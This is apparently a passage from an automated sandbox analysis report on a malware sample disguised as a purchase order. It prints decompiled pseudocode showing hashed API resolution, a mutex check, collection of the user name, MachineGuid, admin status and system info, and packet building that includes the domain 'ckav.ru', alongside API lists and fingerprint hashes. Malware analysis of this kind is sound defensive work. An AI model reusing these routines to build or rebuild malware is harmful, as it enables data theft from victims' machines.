                      					if(_t43 == 0) {
                      						goto L10;
                      					}
                      					_push(0);
                      					__eflags = E00403C59(_a4, _t43);
                      					if(__eflags != 0) {
                      						_v8 = 0;
                      						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                      						_push(_t43);
                      						 *_a8 = _v8;
                      						E00403D44();
                      					}
                      					E00402BAB(_t43);
                      					return _t46;
                      				}
                      				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                      				_t44 =  *_t25(_t42,  &_v12);
                      				if(_v12 != 0 || _t44 > 0x40000000) {
                      					L8:
                      					_t45 = _v8;
                      					goto L9;
                      				} else {
                      					_t28 = _a8;
                      					if(_t28 != 0) {
                      						 *_t28 = _t44;
                      					}
                      					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                      					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                      					_t35 = _t30;
                      					if(_t35 == 0) {
                      						goto L8;
                      					} else {
                      						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                      						_t45 = _v8;
                      						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                      						if(_t32 == 0) {
                      							_t33 = E004031E5(_t35, _t46, 0xf53ecacb, _t46, _t46);
                      							 *_t33(_t35, _t46, 0x8000);
                      							_t35 = _t46;
                      						}
                      						L9:
                      						E00403C40(_t45); // executed
                      						goto L10;
                      					}
                      				}
                      			}




















                      APIs
                      • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                      • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$AllocCreateReadVirtual
                      • String ID: .tmp
                      • API String ID: 3585551309-2986845003
                      • Opcode ID: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                      • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                      • Opcode Fuzzy Hash: 3c21b548154e04a740e383bdfa5f0ec46f521fe53328019d1d2661260406abab
                      • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 79%
                      			E00413866(void* __eflags) {
                      				short _v6;
                      				short _v8;
                      				short _v10;
                      				short _v12;
                      				short _v14;
                      				short _v16;
                      				short _v18;
                      				short _v20;
                      				short _v22;
                      				char _v24;
                      				short _v28;
                      				short _v30;
                      				short _v32;
                      				short _v34;
                      				short _v36;
                      				short _v38;
                      				short _v40;
                      				short _v42;
                      				short _v44;
                      				short _v46;
                      				char _v48;
                      				short _v52;
                      				short _v54;
                      				short _v56;
                      				short _v58;
                      				short _v60;
                      				short _v62;
                      				short _v64;
                      				short _v66;
                      				short _v68;
                      				short _v70;
                      				short _v72;
                      				short _v74;
                      				char _v76;
                      				void* __ebx;
                      				void* __edi;
                      				void* _t38;
                      				short _t43;
                      				short _t44;
                      				short _t45;
                      				short _t46;
                      				short _t47;
                      				short _t48;
                      				short _t50;
                      				short _t51;
                      				short _t52;
                      				short _t54;
                      				short _t55;
                      				intOrPtr* _t57;
                      				intOrPtr* _t59;
                      				intOrPtr* _t61;
                      				void* _t63;
                      				WCHAR* _t65;
                      				long _t68;
                      				void* _t75;
                      				short _t76;
                      				short _t78;
                      				short _t83;
                      				short _t84;
                      				short _t85;
                      
                      				E00402C6C(_t38);
                      				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                      				SetErrorMode(3); // executed
                      				_t43 = 0x4f;
                      				_v76 = _t43;
                      				_t44 = 0x4c;
                      				_v74 = _t44;
                      				_t45 = 0x45;
                      				_v72 = _t45;
                      				_t46 = 0x41;
                      				_v70 = _t46;
                      				_t47 = 0x55;
                      				_v68 = _t47;
                      				_t48 = 0x54;
                      				_t76 = 0x33;
                      				_t84 = 0x32;
                      				_t83 = 0x2e;
                      				_t78 = 0x64;
                      				_t85 = 0x6c;
                      				_v66 = _t48;
                      				_v52 = 0;
                      				_t50 = 0x77;
                      				_v48 = _t50;
                      				_t51 = 0x73;
                      				_v46 = _t51;
                      				_t52 = 0x5f;
                      				_v42 = _t52;
                      				_v28 = 0;
                      				_t54 = 0x6f;
                      				_v24 = _t54;
                      				_t55 = 0x65;
                      				_v20 = _t55;
                      				_v64 = _t76;
                      				_v62 = _t84;
                      				_v60 = _t83;
                      				_v58 = _t78;
                      				_v56 = _t85;
                      				_v54 = _t85;
                      				_v44 = _t84;
                      				_v40 = _t76;
                      				_v38 = _t84;
                      				_v36 = _t83;
                      				_v34 = _t78;
                      				_v32 = _t85;
                      				_v30 = _t85;
                      				_v22 = _t85;
                      				_v18 = _t76;
                      				_v16 = _t84;
                      				_v14 = _t83;
                      				_v12 = _t78;
                      				_v10 = _t85;
                      				_v8 = _t85;
                      				_v6 = 0;
                      				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                      				 *_t57( &_v76);
                      				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                      				 *_t59( &_v48);
                      				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                      				_t81 =  &_v24;
                      				 *_t61( &_v24); // executed
                      				_t63 = E00414059(); // executed
                      				if(_t63 != 0) {
                      					_t65 = E00413D97(0);
                      					E004031E5(0, 0, 0xcf167df4, 0, 0);
                      					CreateMutexW(0, 1, _t65); // executed
                      					_t68 = GetLastError();
                      					_t92 = _t68 - 0xb7;
                      					if(_t68 == 0xb7) {
                      						E00413B81(0);
                      						_pop(_t81); // executed
                      					}
                      					E00413003(_t92); // executed
                      					E00412B2E(_t92); // executed
                      					E00412D31(_t81, _t84); // executed
                      					E00413B3F();
                      					E00413B81(0);
                      					 *0x49fdd0 = 1;
                      				}
                      				return 0;
                      			}

                      APIs
                      • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                      • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                      • GetLastError.KERNEL32 ref: 0041399E
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Error$CreateLastModeMutex
                      • String ID:
                      • API String ID: 3448925889-0
                      • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                      • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                      • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                      				long _v8;
                      				void* _t7;
                      				long _t10;
                      				void* _t21;
                      				struct _OVERLAPPED* _t24;
                      
                      				_t14 = __ebx;
                      				_t24 = 0;
                      				_v8 = 0;
                      				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                      				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                      				_t21 = _t7;
                      				if(_t21 != 0xffffffff) {
                      					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                      					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                      					if(_t10 != 0xffffffff) {
                      						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                      						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                      						_t24 =  !=  ? 1 : 0;
                      					}
                      					E00403C40(_t21); // executed
                      				}
                      				return _t24;
                      			}

                      APIs
                      • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                      • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CreatePointerWrite
                      • String ID:
                      • API String ID: 3672724799-0
                      • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                      • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                      • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 34%
                      			E00412D31(void* __ecx, void* __edi) {
                      				long _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char _v24;
                      				char _v40;
                      				void* __ebx;
                      				intOrPtr* _t10;
                      				void* _t11;
                      				void* _t25;
                      				void* _t26;
                      				void* _t27;
                      				void* _t35;
                      				void* _t53;
                      				char* _t57;
                      				void* _t58;
                      				void* _t61;
                      				void* _t64;
                      				void* _t65;
                      				intOrPtr* _t66;
                      				void* _t67;
                      				void* _t68;
                      				void* _t69;
                      				void* _t70;
                      				void* _t71;
                      				void* _t72;
                      				void* _t73;
                      
                      				_t53 = __ecx;
                      				_t10 =  *0x49fde0;
                      				_t68 = _t67 - 0x24;
                      				 *0x49fddc = 0x927c0;
                      				 *0x49fde4 = 0;
                      				_t75 = _t10;
                      				if(_t10 != 0) {
                      					L16:
                      					_push(1);
                      					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                      					_t61 = _t11;
                      					_t68 = _t68 + 0xc;
                      					if(_t61 != 0) {
                      						E004031E5(0, 0, 0xfcae4162, 0, 0);
                      						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                      					}
                      					L004067C4(0xea60); // executed
                      					_pop(_t53);
                      				} else {
                      					_push(__edi);
                      					 *0x49fde0 = E004056BF(0x2bc);
                      					E00413DB7(_t53, _t75,  &_v40);
                      					_t57 =  &_v24;
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					asm("movsd");
                      					E004058D4( *0x49fde0, 0x12);
                      					E004058D4( *0x49fde0, 0x28);
                      					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                      					_t69 = _t68 + 0x28;
                      					_t64 = E0040632F();
                      					_push(0);
                      					_push(1);
                      					if(_t64 == 0) {
                      						_push(0);
                      						_push( *0x49fde0);
                      						E00405872();
                      						_t70 = _t69 + 0x10;
                      					} else {
                      						_push(_t64);
                      						_push( *0x49fde0);
                      						E00405872();
                      						E00402BAB(_t64);
                      						_t70 = _t69 + 0x14;
                      					}
                      					_t58 = E00406130(_t57);
                      					_push(0);
                      					_push(1);
                      					_t77 = _t64;
                      					if(_t64 == 0) {
                      						_push(0);
                      						_push( *0x49fde0);
                      						_t25 = E00405872();
                      						_t71 = _t70 + 0x10; // executed
                      					} else {
                      						_push(_t58);
                      						_push( *0x49fde0);
                      						E00405872();
                      						_t25 = E00402BAB(_t58);
                      						_t71 = _t70 + 0x14;
                      					}
                      					_t26 = E004061C3(_t25, 0, _t77); // executed
                      					_t65 = _t26;
                      					_push(0);
                      					_push(1);
                      					if(_t65 == 0) {
                      						_push(0);
                      						_push( *0x49fde0);
                      						_t27 = E00405872();
                      						_t72 = _t71 + 0x10;
                      					} else {
                      						_push(_t65);
                      						_push( *0x49fde0);
                      						E00405872();
                      						_t27 = E00402BAB(_t65);
                      						_t72 = _t71 + 0x14;
                      					}
                      					_t66 = E00406189(_t27);
                      					_t79 = _t66;
                      					if(_t66 == 0) {
                      						E00405781( *0x49fde0, 0);
                      						E00405781( *0x49fde0, 0);
                      						_t73 = _t72 + 0x10;
                      					} else {
                      						E00405781( *0x49fde0,  *_t66);
                      						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                      						E00402BAB(_t66);
                      						_t73 = _t72 + 0x14;
                      					}
                      					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                      					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                      					_t35 = E0040642C(_t79); // executed
                      					E004058D4( *0x49fde0, _t35);
                      					E004058D4( *0x49fde0, _v24);
                      					E004058D4( *0x49fde0, _v20);
                      					E004058D4( *0x49fde0, _v16);
                      					E004058D4( *0x49fde0, _v12);
                      					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                      					_t68 = _t73 + 0x48;
                      				}
                      				_t80 =  *0x49fde4;
                      				if( *0x49fde4 == 0) {
                      					_t10 =  *0x49fde0;
                      					goto L16;
                      				}
                      				return E00405695(_t53,  *0x49fde0);
                      			}

                      APIs
                      • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                        • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                        • Part of subcall function 00402BAB: RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$CreateFreeProcessThread_wmemset
                      • String ID: ckav.ru
                      • API String ID: 2915393847-2696028687
                      • Opcode ID: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                      • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                      • Opcode Fuzzy Hash: d166330210f886f258cea0f95f040112802ba461a537879de6ad45a462bfc85e
                      • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040632F() {
                      				char _v8;
                      				void* _t4;
                      				void* _t7;
                      				void* _t16;
                      
                      				_t16 = E00402B7C(0x208);
                      				if(_t16 == 0) {
                      					L4:
                      					_t4 = 0;
                      				} else {
                      					E0040338C(_t16, 0, 0x104);
                      					_t1 =  &_v8; // 0x4143e8
                      					_v8 = 0x208;
                      					_t7 = E00406069(_t16, _t1); // executed
                      					if(_t7 == 0) {
                      						E00402BAB(_t16);
                      						goto L4;
                      					} else {
                      						_t4 = _t16;
                      					}
                      				}
                      				return _t4;
                      			}

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • _wmemset.LIBCMT ref: 0040634F
                        • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateNameProcessUser_wmemset
                      • String ID: CA
                      • API String ID: 2078537776-1052703068
                      • Opcode ID: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                      • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                      • Opcode Fuzzy Hash: ea15dbf965de6c39536eadaef71d36bb12a2dd1a9f609459e064ebb7523f79d3
                      • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                      				int _t7;
                      				void* _t8;
                      
                      				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                      				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                      				return _t7;
                      			}

                      APIs
                      • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: InformationToken
                      • String ID: IDA
                      • API String ID: 4114910276-365204570
                      • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                      • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                      • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                      				_Unknown_base(*)()* _t5;
                      				void* _t6;
                      
                      				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                      				_t1 =  &_a8; // 0x403173
                      				_t5 = GetProcAddress(_a4,  *_t1); // executed
                      				return _t5;
                      			}

                      APIs
                      • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc
                      • String ID: s1@
                      • API String ID: 190572456-427247929
                      • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                      • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                      • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 92%
                      			E00404A52(void* _a4, char* _a8, char* _a12) {
                      				void* _v8;
                      				int _v12;
                      				void* __ebx;
                      				char* _t10;
                      				long _t13;
                      				char* _t27;
                      
                      				_push(_t21);
                      				_t27 = E00402B7C(0x208);
                      				if(_t27 == 0) {
                      					L4:
                      					_t10 = 0;
                      				} else {
                      					E00402B4E(_t27, 0, 0x208);
                      					_v12 = 0x208;
                      					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                      					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                      					if(_t13 != 0) {
                      						E00402BAB(_t27);
                      						goto L4;
                      					} else {
                      						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                      						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                      						E00404A39(_v8); // executed
                      						_t10 = _t27;
                      					}
                      				}
                      				return _t10;
                      			}

                      APIs
                        • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                        • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                      • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                      • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateOpenProcessQueryValue
                      • String ID:
                      • API String ID: 1425999871-0
                      • Opcode ID: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                      • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                      • Opcode Fuzzy Hash: d488a9f9e3e4912de19e98427526cb377b3f09abeed86899b322f2e70aeae98a
                      • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402BAB(void* _a4) {
                      				void* _t3;
                      				char _t5;
                      
                      				if(_a4 != 0) {
                      					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                      					return _t5;
                      				}
                      				return _t3;
                      			}






                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • RtlFreeHeap.NTDLL(00000000), ref: 00402BC0
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$FreeProcess
                      • String ID:
                      • API String ID: 3859560861-0
                      • Opcode ID: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                      • Instruction ID: 8dd5a347e09044be93d5ac0bfd75615970d35e99714971ab129ae27a0189db5c
                      • Opcode Fuzzy Hash: 0ab6f2dbedfa6cb862415dde11aab857cc1d2c8de5bdcfad433bf240e63de12c
                      • Instruction Fuzzy Hash: 7FC01235000A08EBCB001FD0E90CBE93F6CAB8838AF808020B60C480A0C6B49090CAA8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 40%
                      			E004060BD(void* __eflags) {
                      				signed int _v8;
                      				char _v12;
                      				short _v16;
                      				char _v20;
                      				void* __ebx;
                      				intOrPtr* _t12;
                      				signed int _t13;
                      				intOrPtr* _t14;
                      				signed int _t15;
                      				void* _t24;
                      
                      				_v16 = 0x500;
                      				_v20 = 0;
                      				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                      				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                      				_v8 = _t13;
                      				if(_t13 != 0) {
                      					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                      					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                      					asm("sbb eax, eax");
                      					_v8 = _v8 &  ~_t15;
                      					E0040604F(_v12);
                      					return _v8;
                      				}
                      				return _t13;
                      			}














                      APIs
                      • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: CheckMembershipToken
                      • String ID:
                      • API String ID: 1351025785-0
                      • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                      • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                      • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                      				void* _t3;
                      				int _t5;
                      
                      				_t3 = E00403D4D(__eflags, _a4); // executed
                      				if(_t3 == 0) {
                      					__eflags = 0;
                      					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                      					_t5 = CreateDirectoryW(_a4, 0); // executed
                      					return _t5;
                      				} else {
                      					return 1;
                      				}
                      			}






                      APIs
                      • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateDirectory
                      • String ID:
                      • API String ID: 4241100979-0
                      • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                      • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                      • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 37%
                      			E0040642C(void* __eflags) {
                      				short _v40;
                      				intOrPtr* _t6;
                      				void* _t10;
                      
                      				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                      				 *_t6( &_v40); // executed
                      				return 0 | _v40 == 0x00000009;
                      			}







                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                      Memory Dump Source
                      • Source File: 00000001.00000002.923644553.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000001.00000002.923659857.00000000004A0000.00000040.00000001.sdmp Download File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_Purchase Order #5000012803.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                      • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                      • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
